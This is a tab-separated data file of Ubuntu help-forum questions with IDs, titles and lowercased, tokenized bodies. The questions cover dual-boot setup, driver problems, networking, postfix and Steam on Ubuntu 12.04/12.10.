257462	ubuntu 12.04 /windows7 dual boot with ssd and hdd - partitioning & setup	i 'm running ubuntu 12.04 64 bit and win7 64 bit in dual boot . in few days i 'm planing to use ssd 128gb and my current 500gb hdd to dual boot and have no idea how to set this up . there 's lot of information but mostly imprecise and confusing . what i want to do is : window 7 completely on ssd -c/ 60gb system -d/ 30gb i use win7 rather occasionally so installing it fully on ssd should n't be a problem . ubuntu 12.04 : /boot - 500mb ( on ssd ) / - 10gb ( on ssd ) swap - 1gb ( do n't know where : ssd or hdd ? ) /home - 26,5gb ( on ssd ) and 500gb ( on hdd ) i have some problem with /home partition - do i need to format my hdd as /home during the system installation or there is another way , maybe symlinks ... but how and when create them ? which other folders/directories should be moved to hdd ? second thing : what is all about aligning ? do i need this and how to make this properly ? do i need to enable trim or is it enabled by default ? after searching few forum treads i 'm little bit confused ... basically i need guidance how to properly set up win7 and ubuntu to gain maximum performance and longer life of ssd drive . any advice will be appreciated .
257467	access/mount the partitions inside an lvm2-based disk of a shut-down kvm guest ?	on the kvm host how can i mount the volumes on the disk of a kvm guest that has been shut down , if the disk was configured to be an lvm2-based volume ? the kvm guest was installed using the normal setup dvd of 12.04 and the partitions created are one for / and one for swap . nothing special . no nested lvm2 volumes or so .
257470	can i replace the default login screen for the pantheon greeter ?	i 'm using ubuntu 12.04 , and i 'd like to know if i can replace the default login screen ( light-dm ) for the one used on elementary os ( phantheon greeter ) . if possible without installing the rest of the elementary os desktop .
257472	host alias for ssh	there are a few ssh destinations i will frequently be connecting to and i 'm wondering if rather than remember the ip address i can create a host alias for them . i 'd like to be able to use ... ssh -p xx user @ domain.ssh i 've tried establishing this host in /etc/hosts and unless there 's a service i needed to restart it had no effect .
257473	ubuntu 12.10 new launcher icons do n't launch	in the last week i upgrade skype and installed matlab and neither of their launcher icons seem to work . they will flash as if they are trying to load the program but after a few seconds go back to being off . these programs run perfectly well from terminal . is there a way to fix these ? i put them on the launcher by pinning a running application to it ( although the original one skype added also did n't work )
257476	why does n't splashtop streamer load ?	i just installed splashtop streamer from ubuntu software center . it installed without any errors , but it 's not loading up when i try to start it . i 'm using ubuntu 12.10 .
257479	ubuntu wo n't boot from a usb on my windows 8 laptop	yesterday i set up ubuntu on a 32gb sandisk flash drive . i booted it up on my windows 7 pc , and it works flawlessly . i have n't had any problems getting it to boot with usb priority on that machine , or accessing any data stored on the partition its using . then i tried plugging the same usb into my windows 8 laptop . i changed the bios so that usb has priority , but it still booted straight to windows 8 . i tried 3 different usb ports , and none of them worked . does anyone know if any settings on windows 8 might be affecting this , or what i may be doing wrong ? i can post a picture of my bios if anybody cares to see . this is the laptop i am using
257481	nvidia driver not stretching full screen apps to fill screen	my former nvidia proprietary driver ( 295.40 ) , and all others before it that i can remember , used to stretch any full screen application running bellow my monitor resolution to fill the entire screen by default . even applications running through wine . however after upgrading the driver to version 310.32 this behavior was lost , meaning the application runs on the resolution is set to , and a black border is draw around it to fill the void . is there some option i can apply to xorg.conf to re-enable this behavior once again ? the nvidia gui ( nvidia x server settings ) does not possess such option , and after going through the driver options documentation for my version , i could n't find ( clearly ) any option who could be applied to xorg.conf who would re-enable this behavior . thank you . ubuntu 12.04 lts 64 bits x.org version : 1.11.3 nvidia geforce 9300m gs ( nvidia proprietary driver 310.32 ) update 1 : i 've double checked my xorg.conf and the option `` nostretch '' is not present , therefore it should stretch to fill the screen . however not sure why it does not .
257482	ubuntu 12.10 fresh installation - messed up graphics	i just installed ubuntu 12.10 from scratch , and my os looks like this in lots of places : it was already like that during setup , and i have tried reinstalling with no luck . specs : i5 2500k oced to 4.2 ghz 8 gb ram asrock p67 extreme 4 mobo gtx 560 ti oc partitions : 550 gb ext4 - this is where i installed ubuntu 200 gb ntfs - storage 170~ gb ntfs - this is for windows 8 , which i have n't installed yet 8 gb swap any idea what 's causing this ?
257483	is it there a way to stop kalarm error messages from appearing ?	i use kalarm to schedule a lot of terminal actions in an automation process that involves an internet connection , and kalarm is indeed doing great work . but there are certain days in which the error windows are also a lot when the internet fails . i wonder if there is a way to configure kalarm to not show these error messages/windows . i know that i can prevent errors from appearing just after the error shows the windows and i choose not to receive individual error messages . but what i wish is to make kalarm 's default behavior to not show error messages anymore . i am using only lts official ubuntu distributions . in this case it is 12.04 lts . kde and kalarm are updated . if you need further information/details please let me know . thanks in advance .
257489	do-release-upgrades fails on multiple servers	when i try to upgrade from 12.04 to 12.10 it wo n't even start . following is ther terminal output of do release-upgrade and cat /var/log/dist-upgrade/main.log ( apt.log does n't exist ) . root @ somehost : /tmp # do-release-upgrade checking for a new ubuntu release get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1198 kb ] fetched 1198 kb in 0s ( 0 b/s ) authenticate 'quantal.tar.gz ' against 'quantal.tar.gz.gpg' extracting 'quantal.tar.gz' reading cache checking package manager continue running under ssh ? this session appears to be running under ssh . it is not recommended to perform a upgrade over ssh currently because in case of failure it is harder to recover . if you continue , an additional ssh daemon will be started at port '1022 ' . do you want to continue ? continue [ yn ] y a fatal error occurred please report this as a bug and include the files /var/log/dist-upgrade/main.log and /var/log/dist-upgrade/apt.log in your report . the upgrade has aborted . your original sources.list was saved in /etc/apt/sources.list.distupgrade . traceback ( most recent call last ) : file `` /tmp/update-manager-l6hrmz/quantal '' , line 10 , in < module > sys.exit ( main ( ) ) file `` /tmp/update-manager-l6hrmz/distupgrade/distupgrademain.py '' , line 240 , in main if app.run ( ) : file '' /tmp/update-manager-l6hrmz/distupgrade/distupgradecontroller.py '' , line 1764 , in run return self.fullupgrade ( ) file '' /tmp/update-manager-l6hrmz/distupgrade/distupgradecontroller.py '' , line 1616 , in fullupgrade if not self.prepare ( ) : file '' /tmp/update-manager-l6hrmz/distupgrade/distupgradecontroller.py '' , line 429 , in prepare self._sshmagic ( ) file '' /tmp/update-manager-l6hrmz/distupgrade/distupgradecontroller.py '' , line 299 , in _sshmagic '' do you want to continue ? '' ) % port ) file `` /tmp/update-manager-l6hrmz/distupgrade/distupgradeviewtext.py '' , line 216 , in askyesnoquestion res = sys.stdin.readline ( ) .decode ( encoding , `` backslashreplace '' ) typeerror : decode ( ) argument 1 must be string , not none === command detached from window ( sun feb 17 22:29:59 2013 ) === === command terminated with exit status 1 ( sun feb 17 22:29:59 2013 ) === root @ somehost : /tmp # cat /var/log/dist-upgrade/main.log 2013-02-17 22:29:55,763 info using config files ' [ './distupgrade.cfg ' ] ' 2013-02-17 22:29:55,763 info uname information : 'linux somehost 3.2.0-37-generic # 58-ubuntu smp thu jan 24 15:28:10 utc 2013 x86_64' 2013-02-17 22:29:55,763 info apt version : '0.8.16~exp12ubuntu10.7' 2013-02-17 22:29:55,764 info release-upgrader version '0.190.4 ' started 2013-02-17 22:29:55,883 debug using 'distupgradeviewtext ' view 2013-02-17 22:29:55,915 debug aufsoptionsandenvironmentsetup ( ) 2013-02-17 22:29:55,915 debug using '/tmp/upgrade-rw-3roa1k ' as aufs_rw_dir 2013-02-17 22:29:55,916 debug using '/tmp/upgrade-chroot-cdoxkq ' as aufs chroot dir 2013-02-17 22:29:55,916 debug enable dpkg -- force-overwrite 2013-02-17 22:29:55,926 debug creating statefile : '/var/log/dist-upgrade/apt-clone_system_state.tar.gz' 2013-02-17 22:29:58,326 debug lsb-release : 'precise' 2013-02-17 22:29:59,924 error not handled exception : traceback ( most recent call last ) : file `` /tmp/update-manager-l6hrmz/quantal '' , line 10 , in < module > sys.exit ( main ( ) ) file `` /tmp/update-manager-l6hrmz/distupgrade/distupgrademain.py '' , line 240 , in main if app.run ( ) : file `` /tmp/update-manager-l6hrmz/distupgrade/distupgradecontroller.py '' , line 1764 , in run return self.fullupgrade ( ) file `` /tmp/update-manager-l6hrmz/distupgrade/distupgradecontroller.py '' , line 1616 , in fullupgrade if not self.prepare ( ) : file `` /tmp/update-manager-l6hrmz/distupgrade/distupgradecontroller.py '' , line 429 , in prepare self._sshmagic ( ) file `` /tmp/update-manager-l6hrmz/distupgrade/distupgradecontroller.py '' , line 299 , in _sshmagic `` do you want to continue ? '' ) % port ) file `` /tmp/update-manager-l6hrmz/distupgrade/distupgradeviewtext.py '' , line 216 , in askyesnoquestion res = sys.stdin.readline ( ) .decode ( encoding , `` backslashreplace '' ) typeerror : decode ( ) argument 1 must be string , not none 2013-02-17 22:29:59,925 debug enabling apt cron job
257490	ca n't install ubuntu 12.10 with usb	i 've downloaded the .iso file ( ubuntu-12.10-desktop-i386.iso ) , and then used unetbootin to make my 16gb kingston pendrive a live-usb . then i restart my notebook ( samsung r580 ) and access the bios . i select the option to boot from usb , and restart again . the options screen appears . so far , everything is fine . i choose install ubuntu , then i select the language and then i try to select install alongside an existing w7 . here is where i have trouble . clicking `` continue '' restarts the system , and the option screen appears again and again and again ... . what am i doing wrong ? oh , i also did the checksum , it 's just fine . edit ok , i 've tried several options in the bios ( enable/disable legacy os boot and large disk access mode ) and ... still not working i went to test the live version and tried installing from there . it asked me to unmount partitions , i selected no , and that would n't allow me to install inside windows 7 , so i went back and selected yes , showing me again that option . then i selected the 'something else ' option and there i saw the following info : sda ata samsung hm321hi sda1 ntfs 16106mb 12447mb windows recovery environment ( loader ) sda2 ntfs 104mb 35mb windows 7 ( loader ) sda3 ntfs 151928mb 75593mb sda4 ntfs 151930mb 3221mb i know these are the partitions of the hdd , sda3 and sda4 being c : and d : respectively . these 4 partitions are ntfs formated , maybe this is what is wrong ? do i have to format sda4 with fat32 or something ? add a new partition so sda4 becomes a loader sector ? for the guy that says i should use universal usb installer , i have the same problem with it , it restarts for ever . thanks anyway . update following @ sand dust 's comment , i did have 4 partitions , so using the installer i could set the sda4 partition ( d : ) as free space ( un-allocated ? ) after reading a lot ( lol ) , i 've created 3 partitions manually : / ( 30gb ext4 ) , /swap ( 6gb ) and /home ( 96gb ext4 ) . and then ... finally ! install begun . however , after restarting , it goes straight to windows ... . right now i 'm in the live version and i see the / and /home directories , so i guess the install process went just fine . what 's wrong this time ? could it be something about grub ? i 'm gon na keep reading ...
257491	realtek 8723ae wi-fi wo n't connect	i have read a few threads and found driver installs for my wi-fi card , but when i built them i get the following message : make -c /lib/modules/3.5.0-17-generic/build m=/home/ian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make : *** /lib/modules/3.5.0-17-generic/build : no such file or directory . stop . make : *** [ all ] error 2 i can not connect to the internet at all on the linux machine , and am posting this from a separate computer . edit : lspci -v | grep -ia 7 'network' grep : network : no such file or directory edit2 : sudo modprobe rtl8723ae fatal : module rtl8723ae not found . ~ 02:00.0 network controller : realtek semiconductor co. , ltd. device 8723 subsystem : realtek semiconductor co. , ltd. device 0724 flags : bus master , fast devsel , latency 0 i/o ports at 2000 [ size=256 ] memory at f0000000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 edit 3 modprobe -l | grep rtl87 kernel/drivers/staging/rtl8712/r8712u.ko
257495	compiz - ctrl alt shift does n't move windows anymore	after some wrestling with nvidia drivers and compiz , i got everything up and running , only to find that using ctrl alt shift does n't move windows to different workspaces anymore . clicking the window and dragging it to another workspace works fine , but if i use ctrl alt shift to move windows it flickers in the new workspace for a second before going back to the original workspace . i checked my compiz settings and all seems to be well ... currently running : composite gnome compatibility opengl desktop cube rotate cube animations blur windows fading windows window decoration wobbly windows all image loading compiz library toolbox mouse position polling regex matching workarounds application switcher move window place windows put resize window scale shift switcher i 've tried running : compiz -- replace ... but it does n't do anything . worse , it tends to hang in the terminal and i have to kill the terminal . the workspace panel in the taskbars also does n't reflect what 's on the screen , showing that i 'm on the first workspace panel when i 'm not , and also not showing the windows on the other workspaces . not sure if that info helps , but that 's what it 's doing .
257496	programs to combine bookmarks ?	i 've recently been having some issues with xmarks and found that it has n't been syncing my chromium and firefox bookmarks correctly . is there a way to combine the two bookmark html files ? preferably with no overlaps while adding missing bookmarks , but i 'd be happy if there was any way i can combine the two bookmark files .
257503	ubuntu12.04 the system network service is not compatible with this version	after installing [ libdirectfb-1.2-0_1.2.8-5ubuntu2_i386.deb ] file for trying [ realsoft 3d ] on ubuntu 12.04 lts 64bit , suddenly and without restarting the internet went off and the signal and the network-manager are off too , i tried to lunch the [ network-manager ] from terminal and it didn`t work i found this solution link but i am not sure of how to use it , because i do n't know what to download from those link , and i hope someone professional could advise me because i am new on ubuntu , this is my first month thank you for reading .
257508	system failing to boot 12.04 udev timeout killing '/sbin message	i have a hp pavilion dv6000 with ubuntu 12.04 installed from a usb drive . i tried to do a few things i read on a couple big linux/ubuntu blogs - like change the swappiness , switch to the 2d desktop interface to try and speed this older laptop up . afterwards i had to reboot . upon reboot i was prompted with a gnu grub menu where i could select ubuntu with or without recovery mode along with memory test . memory and disk tests turned up no errors . when i try to load ubuntu , either with or without the recovery mode i get a few udevd [ number ] : timeout : killing : '/sbin/blkid -o udev -p messages repeating . i can enter the grub command line - can i do anything from there ? if not , what else can i do to recover this pc and not lose what 's on it ? if i have to reinstall i will , but i 'd rather not .
257510	how to fix `` chown : invalid group : '' if the user does not exist on the running system ?	i want to fix permissions on another disk with chown . set the permissions to a user which does not exist on the system which is currently running . does that work without adding the user ?
257512	how can i install m2vrequantiser in mythbuntu 12.04 ?	m2vrequantiser can be used by mytharchive to create dvds and .iso 's but it 's apparently not available in 12.04 universe repository . is there some way to get it for 12.04.1 ?
257516	how to boot into windows 8 after ubuntu installation ?	i 'm kinda new to linux & today was the first time i used ubuntu ( i loved it ) . now my laptop is a new one & came pre-installed with windows 8 ( & the uefi complexity as well ) . so i made a partition by shrinking a drive and then installed ubuntu 64-bit version into it using the live dvd without tampering with the secure boot or uefi settings . it 's working fine . now after installation my laptop loads into ubuntu directly & does n't show any option for a dual boot . i wish to make windows 8 my primary os because all the applications related to programming & my studies are installed in windows 8 . can you please tell me what i need to do so that i get an option of choosing which os i wish to login to ?
257518	how do i uninstall ubuntu 12.10 ?	i run windows 7 . created a 90gb partition with 4gb swap memory to install ubuntu 12.10 on . i 've decided not to bother with ubuntu , at least for now on this computer . do i simply just delete the 2 partitions ( 90gb + 4gb ) by right clicking them in disk management `` delete volume '' ? separate question : i have files in ubuntu , but can i just transfer them to windows to keep them ? i tried doing this in ubuntu with 1 tv show episode . i then restarted and booted windows 7 and the file was in my files and was able to play it without a problem . so i just do this for all my files in ubuntu i gather ? when i boot-up my laptop , ubuntu loads automatically after the 10 second countdown . this is just an `` fyi '' before you answer my original question .
257521	fresh ubuntu 12.10 - no audio ( thinkpad t400 )	i installed ubuntu 12.10 on my thinkpad t400 ... but i have no sound and the keyboard buttons for volume up and down do nothing . when i open sound settings , there 's nothing : it 's all greyed out . it is like the driver is missing . alsamixer gives : card : hda intel chip : conexant cx20561 ( hermosa ) what can i do ? t400 : ~ $ sudo aplay -l **** liste des périphériques matériels playback **** home directory /home/louisro not ours . carte 0 : intel [ hda intel ] , périphérique 0 : conexant analog [ conexant analog ] sous-périphériques : 1/1 sous-périphérique # 0 : subdevice # 0 carte 0 : intel [ hda intel ] , périphérique 1 : conexant digital [ conexant digital ] sous-périphériques : 1/1 sous-périphérique # 0 : subdevice # 0 t400 : ~ $ lspci -v | grep -ia 7 'audio ' 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) subsystem : lenovo device 20f2 flags : bus master , fast devsel , latency 0 , irq 49 memory at fc020000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel in the upper bar the sound icon is not functionning : the sound works out of the box with a live usb ubuntu with /etc/modprobe.d/alsa-base.conf containing the following : # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2
257530	problems creating a new user in ubuntu	i am experimenting with nginx+uswgi+flask and am following this tutorial . however when i get to the portion for creating a new user for uswgi i am having troubles . when i enter the command from the snippet the error i get is $ sudo adduser -c 'uwsgi user , , , ' -g nginx -d /nonexistent -s /bin/false uwsgi option g is ambiguous ( gecos , gid , group ) option d is ambiguous ( debug , disabled-login , disabled-password ) option s is ambiguous ( shell , system ) ... i am by no means a ubuntu pro but after doing a little research i think the options i want are $ sudo adduser -c 'uwsgi , , , ' -- group nginx -- debug /nonexistent -- system /bin/false uwsgi however the error this returns is : adduser : only one or two names allowed . here is my version information ( if that helps ) $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise so my question is what options should i be using to successfully create a uwsgi user such that i can complete the tutorial ?
257534	is it feasible to install and play games in steam while steam is in wine ( playonlinux )	so i downloaded steam on playonlinux and i installed some random games and they open but i ca n't do anything with them i can move the mouse around and the menu buttons change , but i ca n't actually click anything . the games i tried it on were castle crashers , deus ex : hr , and super meat boy and they all did the same thing . should i just download the games from playonlinux and then choose to download the steam version or can i actually have them in steam , and i 'm just doing something wrong . also i 'm on ubuntu 12.10 using playonlinux 4.19 with a gtx 560 and the nvidia experimental binary drivers . i use native steam on ubuntu for the games that are available for linux , but i want to be able to play my other games that are n't available on linux , and have them all in steam , instead of having them strewn around in playonlinux .
257537	why does 'turn on recommendations ' in usc not stay on ?	every time i open the ubuntu software center , i have to click on 'turn on recommendations ' . i want it to stay on ! edit : as requested , here 's the contents of my usc cfg file ( ids omitted for obvious privacy concerns ) : [ general ] maximized = false size = 1200 , 800 add_to_launcher = false recommender_uuid = recommender_profile_id = email =
257551	trying to boot from usb	i am using an hp probook 4540s which currently has ubuntu 12.10 on it . i hit escape to go to which drive to boot from , and when i manage to choose the usb i get something like `` insane primary partition ( mbr ) i cant find myself from what you are trying to boot from . boot : '' where do i go from here ?
257559	ubuntu 64 bit crashes	i installed 64 bit ubuntu 12.10 recently on a freshly formatted hard drive . my problem is that whenever i open a program like firefox or thunderbird there 's a pause and then my screen goes black for a second and it logs me out . the software center works and i can access terminal just not programs . my specs are 8 gb ddr3 ram , i5 3570k cpu , nvidia gtx 670 graphics card and a 650 gb hard drive . i can run 32 bit version of ubuntu without problems . any ideas ? edit : steam also crashes when it opens up , i can log into but when it actually opens up it crashes as well . thevwirdest thing is that ive reinstalled ubuntu like 4 times now , samething everytime . i 'm installing it from usb though . also tried re downloading it to usb multiple times . and i tried going into the live usb then installing as well as installing from the menu .
257562	why ca n't i see my lan network with gigabyte ga-h77-ds3h ?	i ca n't connect via ethernet cable to my linksys wrtsl554gs router . i think my mobo , a gigabyte ga-h77-ds3h does not have wi-fi so i do n't have that option either . when i do a ifconfig this is what i see : lo link encap : local loopback tnet addr:127.0.01 mask:255.0.0.0 tnet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:16 errors:0 dropped:0 overuns:0 frame:0 tx packets:16 errors:0 dropped:0 overuns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1184 ( 1.1 kb ) tx bytes:1184 ( 1.1 kb ) i do not see the eth0 or eth1 listed . do i have to do something in the bios ? i am not familiar with this bios on the new motherboard .
257564	catalyst control center settings not loading on startup	i set ubuntu to use the proprietary amd fglrx drivers included in the software sources menu . after first rebooting , i noticed that the image on my monitor was not scaled to fill my monitor completely , but instead left a 1 inch thick black frame around the image . i fixed this by going into the catalyst control center and changing underscan to 0 % , which scaled the image properly and filled out the entire screen . then i rebooted , and the problem was back , again there is the same 1 inch thick boarder framing the image on my monitor . i thought that maybe i forgot to save my settings or something , so i went back into catalyst control center to check , but all the settings were right and just the way i left it . if i readjust the slider for underscan the image is set back to full panel size , and looks right , but ubuntu does not seem to remember this after reboot . what can i do to make ubuntu remember my setting , and have the image scale correctly on start up ? my graphics card is an ati radeon hd 6970 2gb , my monitor is a fujitsu siemens sl23t-1 23 '' this is how the settings look when my computer starts up , and how they are supposed to look to have the image scale correctly , even though it 's not scaled . if i adjust the slider it scales correctly .
257565	can not mount usb disks due to `` not authorized '' error	i have ubuntu 12.04 ( .2 ? ) installed . i do n't plan to need gui after setup so i modified the grub to start in console . however , whenever i want to start up gui i need to type startx . simple/basic stuff . however i seem to be hitting a snag : i am having trouble mounting/accessing usb flash drives in the gui i started in the console . `` unable to mount location - not authorized '' . seemed like it should be an easy fix , but ca n't figure out how i 'm overlooking it . can someone help me out ?
257567	prevent a fullscreen game from disabling the volume control keys	i just installed puddle which automatically goes to full-screen when you start it . as soon as it starts , the keyboard shortcuts for increasing/decreasing the volume ( fn+f5 and fn+f6 ) stop working . ( i seem to remember the same thing happening for other games . ) is there a way to make those keys continue to work while the game is running ?
257569	ubuntu doesnt use the fgrlx graphics driver ?	i have got the ubuntu 12.04 64 bit lts version and i want to play games with steam . i tried out tf2 and it runs and has decent ( not good ) performance . i believe that my drivers are still running on the standard driver and not the amd proprietary one . i installed amd drivers with gui and restarted the pc , but after that it just said the graphic driver is activated but not in use . if i type amd in dash , i can access the control center and can change brightness with it . in system option - > about , it says that i 'm using graphics : vesa : 01 , but i 'm actually using a hd 7870 . how can i find out what graphic card i 'm actually using or how can i install this one correctly ?
257578	i 'm trying to run steam but 32-bit libraries are missing	you are missing the following 32-bit libraries , and steam may not run : libxrandr.so.2 libpangoft2-1.0.so.0 libpango-1.0.so.0 libfreetype.so.6 libfontconfig.so.1 libgobject-2.0.so.0 libglib-2.0.so.0 libgtk-x11-2.0.so.0 libgtk-x11-2.0.so.0 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libgdk_pixbuf-2.0.so.0 libcairo.so.2 libpango-1.0.so.0 libfreetype.so.6 libfontconfig.so.1 libgobject-2.0.so.0 libglib-2.0.so.0 libxi.so.6 libasound.so.2 libxrender.so.1 libnss3.so libnssutil3.so libsmime3.so libplc4.so libnspr4.so libdbus-1.so.3 libpng12.so.0 libcups.so.2 libgcrypt.so.11
257580	emacs c- . not working in terminal	i use gnu emacs , usually like emacs -nw which launches the terminal version ( as opposed to the windowed gui version ) . i write school papers in latex so i use flyspell-mode for spell-checking within emacs . this works fine in the gui version , but in a terminal , i run into issues with the keystroke c- . ( ctrl-. ) . in a tty , this does nothing , and in terminator or gnome-terminal , this simply inputs a `` . '' . what can i do to make it do what it does in the windowed version ( show spelling suggestions for a misspelled word ) ? edit : in case this matters , i am using ubuntu 12.04 with emacs 23.3.1 ( which i believe is default from the 12.04 repo ) .
257585	switch user , logout , lock screen -- all broken	at various times , which i ca n't pin down exactly , my 12.10 with unity fails to lock the screen after timeout , fails to log me out when i click log out , fails to switch users when i command it , fails to shutdown or restart . sometimes i ca n't log into either of the two profiles that are set up on the machine and have to reboot it . sometimes the reboot does n't fix this and i have to shut the machine down and restart it to be able to log in . another thing i noticed that may or may not be related is that often , when i try to click on something in the panel on the top right that has a drop-down menu , the menu wo n't come down until i click on a menu on the left , drop a menu down over there , then go back to the right hand side and then the drop-downs will work . this has been going on in one form or another since 11.10 .
257587	where do i find the uuid of a network connection on ubuntu server ? ( no network-manager )	i have a clean installation of ubuntu 12.04 server . i would like to find the uuid for a network connection . how do i find this ? ifconfig -a does not list it : eth0 link encap : ethernet hwaddr 00:1e:67:6a:78 : a8 inet addr:192.168.50.18 bcast:192.168.50.255 mask:255.255.255.0 inet6 addr : fe80 : :21e:67ff : fe6a:78a8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:572287 errors:0 dropped:0 overruns:0 frame:0 tx packets:70324 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:222908307 ( 222.9 mb ) tx bytes:7982096 ( 7.9 mb ) interrupt:16 memory : c2300000-c2320000 nmcli is not installed ( because this is ubuntu server ) : user @ server # nmcli the program 'nmcli ' is currently not installed . you can install it by typing : apt-get install network-manager from a desktop install , i can do : user @ desktop # nmcli c list name uuid type timestamp-real wired connection 2 d00a6778-80d6-4812-ad54-041de24e47fe 802-3-ethernet mon 16 dec 2013 12:20:09 est wired connection 1 4fb95570-1922-495a-b498-846b7a6b0655 802-3-ethernet tue 17 dec 2013 11:20:03 est miwifi f3182ff5-81c2-44c4-9c4b-d3a1f0a550e9 802-11-wireless never how do i find it when network-manager is n't installed ? surely i do n't have to install network-manager ?
257588	i need to sync my postfix config to a second server and have postfix reload when changes are made	i 'd like to start out saying that i know enough linux commands to be dangerous : - ) with that warning out of the way , here is what i am trying to figure out how to handle . currently i have a single server running ubuntu 12.04 and postfix . i would like to have a second server running for redundancy , and set a second mx record in my dns for this server . i 'm trying to minimize the chance of error in having two separate servers with the possibility of two different configurations . specifically with regard to the custom relay_recipients and custom_replies files ( along with the .db version of each of these files created from the postmap process ) . scheduling a rsync process would appear to be one method of getting the files synced between the servers . however this would leave a period of time after one system is updated that the other system is out of date , until the cron job ran . i am also presented with the problem of running the sudo postfix reload command if a new file is synced . so i guess ideally i would like my `` main '' system to detect when a new relay_recipents.db file ( or custom_replies.db ) is created . then push those files to the backup server . on the backup server once any new files are detected then sudo postfix reload should be executed to allow the changes to go into effect . any ideas on how to best accomplish something like this ?
257589	input not supported . please help !	i rebooted my computer running ubuntu 12.04 and now i 'm getting an `` input not supported '' or `` mode not supported '' ( depending on which monitor i hook my computer up to ) . i understand this is because of some resolution size configuration problem . the monitor is looking for one spec and the computer is kicking out another . i think i 've found which file i need to edit but the problem is i have no gui because it wo n't boot ! i tried holding shift on boot to get to the grub menu but it says `` grub loading.. '' and then we 're back to `` input not supported . '' i tried to ssh into the computer because i know its ip address but that 's not working either for some reason . i can ssh into any other computer on my network but not this one . could that be related ? any insight will be much appreciated .
257590	how to run unity-3d on desktop	my output of lspci | grep vga is : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) can i enable unity-3d on my pc ? if so , tell me how i can please . thank you
257591	recover disconnected files	context : so i recently lost a lot of my files that i had synched with ubuntu one.however , afraid that ubuntu one might refresh its synchronization and thus delete my files even in the back up , i disconnected it.this somehow led to having no files in ubuntu one . question : so is there a way i can recover those files ? do they exist in some trash in the ubuntu one database ? i will happily pay to get them retrieved . thank you any help will be greatly appreciated .
257594	how can i install postfix 2.10 on ubuntu 12.04	i have used `` sudo apt-get install postfix '' to install postfix on my server , running ubuntu 12.04 lts . however the version of postfix that is installed in 2.9.3 . i looking for a feature that became available in postfix 2.10 - the current stable release - however i do n't seem to be able to get the version installed using the apt-get command . is there something that i am doing wrong ?
257596	`` on demand '' lamp stack	i 'd like to install a lamp stack on my laptop in order to be able to locally develop php websites . however , since my computer is a laptop , and since i do n't always need having apache and mysql server running , i 'd like to setup a simple way to start and stop the lamp stack when i need it . what method do you suggest to achieve that ? disable apache and mysql daemons and start / stop them when needed ? install lamp stack on a virtual machine and share the network with the host to access the developed websites ? other suggestions ?
